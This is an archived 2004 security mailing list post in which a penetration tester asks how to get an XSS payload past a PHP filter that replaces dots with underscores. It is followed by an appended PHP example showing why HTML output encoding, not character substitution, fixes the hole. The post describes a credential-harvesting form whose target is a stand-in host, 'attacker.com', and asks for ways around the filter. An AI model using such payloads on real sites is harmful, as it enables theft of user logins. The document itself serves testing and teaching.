WebApp Sec mailing list archives

Fullstop Substitution in XSS
From: "Calum Power" <enune () fribble net>
Date: Sat, 29 May 2004 14:49:29 +1000 (EST)

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum
--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net
http://www.fribble.net
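
Seen from the remediation side, the behaviour reported in this post shows why substituting one character is not an XSS fix. The following is an added example, not part of the original message and not the tested application's code: it assumes the filter is a plain `str_replace` of "." with "_", uses hypothetical function names, and compares that filter with HTML output encoding on the form tag quoted above.

```php
<?php
// Added example. Assumption: the filter in the post is a plain
// substitution of "." with "_". All function names are hypothetical.

// Weak: character substitution as described in the post.
function dot_filter(string $input): string
{
    return str_replace('.', '_', $input);
}

// Hardened: encode for the HTML body/attribute context at output time.
function encode_for_html(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Report which HTML-significant characters are still present in the output.
function surviving_metachars(string $output): array
{
    $found = [];
    foreach (['<', '>', '"', "'"] as $ch) {
        if (strpos($output, $ch) !== false) {
            $found[] = $ch;
        }
    }
    return $found;
}

// Constructed input: the form tag quoted in the post.
$input = '<form target="http://attacker.com/path/to/script">';

foreach (['dot_filter', 'encode_for_html'] as $fn) {
    $out  = $fn($input);
    $left = surviving_metachars($out);
    printf(
        "%-16s %s\n  surviving metacharacters: %s\n",
        $fn,
        $out,
        $left ? implode(' ', $left) : 'none'
    );
}
```

The substitution changes only the hostname and leaves `<`, `>` and `"` in the response, so the browser still parses the tag; the encoded output contains none of them and is rendered as text.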